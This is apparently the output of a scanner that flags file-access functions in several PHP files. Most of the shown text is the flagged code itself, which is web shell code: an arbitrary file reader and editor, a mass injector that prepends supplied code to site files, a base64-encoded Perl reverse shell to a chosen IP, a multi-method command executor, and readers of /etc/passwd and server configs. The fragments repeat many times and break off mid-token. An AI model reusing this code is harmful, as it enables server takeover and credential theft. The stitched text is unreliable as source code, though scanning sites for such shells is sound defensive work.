? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33file_put_contents was found in the file bizhbjpehw.php 298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f3394d1c6c); echo '<br><br><br>';} }}326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decodfopen was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfread was found in the file bizhbjpehw.php 326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dda35 = '';if (function_exists('exec')) {@exec($_6d1b263a32f3,$_1765c46dda35);$_1765c46dda35 = @join('\n',$_1765c46dda35);} elseif (function_exists('passthru')) {ob_start();@passthru($_6d1b263a32f3);$_1765c46dda35 = ob_get_clean();} elseif (function_exists('system')) {ob_start();@system($_6d1b263a32f3);$_1765c46dda35 = ob_get_clean();} elseif (function_exists('shell_exec')) {$_1765c46dda35 = shell_exec($_6d1b263a32f3);} elseif (is_resource($_e0887aa7bc0b = @popen($_6d1b263a32f3,'r'))) {$_1765c46dda35 = '';while(!@feof($_e0887aa7bc0b))$_1765c46dda35 .= fread($_e0887aa7bc0b,1024);pclose($_e0887aa7bc0b);}return $_1765c46dda35;}ifopen was found in the file dtcyxbttww.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fwrite was found in the file dtcyxbttww.php 110: fwrite($handle, $file);fclose was found in the file dtcyxbttww.php 111: fclose($handle);fopen was found in the file dtcyxbttww.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fopen was found in the file dtcyxbttww.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fopen was found in the file dtcyxbttww.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);file_get_contents was found in the file dtcyxbttww.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);file_put_contents was found in the file dtcyxbttww.php 402: $save = file_put_contents($_GET['file'], $_POST['src']);file_get_contents was found in the file dtcyxbttww.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);file_get_contents was found in the file dtcyxbttww.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);fopen was found in the file dtcyxbttww.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);readfile was found in the file dtcyxbttww.php 729: readfile($file);file_get_contents was found in the file lrcyqjkwcn.php 102: echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');145: <textarea cols=130 rows=10 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />fopen was found in the file lrcyqjkwcn.php 136: $fp = fopen($_POST['path'],'w');fwrite was found in the file lrcyqjkwcn.php 137: if(fwrite($fp,$_POST['src'])){fclose was found in the file lrcyqjkwcn.php 142: fclose($fp);file_get_contents was found in the file lrcyqjkwcn.php 102: echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');145: <textarea cols=130 rows=10 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />file_get_contents was found in the file aisemkwerk.php 102: echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');145: <textarea cols=130 rows=10 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />fopen was found in the file aisemkwerk.php 136: $fp = fopen($_POST['path'],'w');fwrite was found in the file aisemkwerk.php 137: if(fwrite($fp,$_POST['src'])){fclose was found in the file aisemkwerk.php 142: fclose($fp);file_get_contents was found in the file aisemkwerk.php 102: echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');145: <textarea cols=130 rows=10 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />fopen was found in the file vfykoxifen.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fwrite was found in the file vfykoxifen.php 110: fwrite($handle, $file);fclose was found in the file vfykoxifen.php 111: fclose($handle);fopen was found in the file vfykoxifen.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fopen was found in the file vfykoxifen.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);fopen was found in the file vfykoxifen.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);file_get_contents was found in the file vfykoxifen.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);file_put_contents was found in the file vfykoxifen.php 402: $save = file_put_contents($_GET['file'], $_POST['src']);file_get_contents was found in the file vfykoxifen.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);file_get_contents was found in the file vfykoxifen.php 398: print '<textarea readonly>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea>';415: <textarea name='src'>'.htmlspecialchars(@file_get_contents($_GET['file'])).'</textarea><br>669: $get = file_get_contents($config);fopen was found in the file vfykoxifen.php 109: $handle = fopen($filename, $mode);301: $fopen = fopen('/etc/passwd', 'r') or die(color(1, 1, 'Can't read /etc/passw302: while($read = fgets($fopen)) {310: $fopen = fopen('/etc/named.conf', 'r');311: while($read = fgets($fopen)) {335: $fopen = fopen($filename, 'a+');336: if($fopen) {673: $fopen = fopen('config_fucker/$user~$userconfig.txt', 'w');674: fputs($fopen, $get);readfile was found in the file vfykoxifen.php 729: readfile($file);file_get_contents was found in the file acdtcgfbso.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 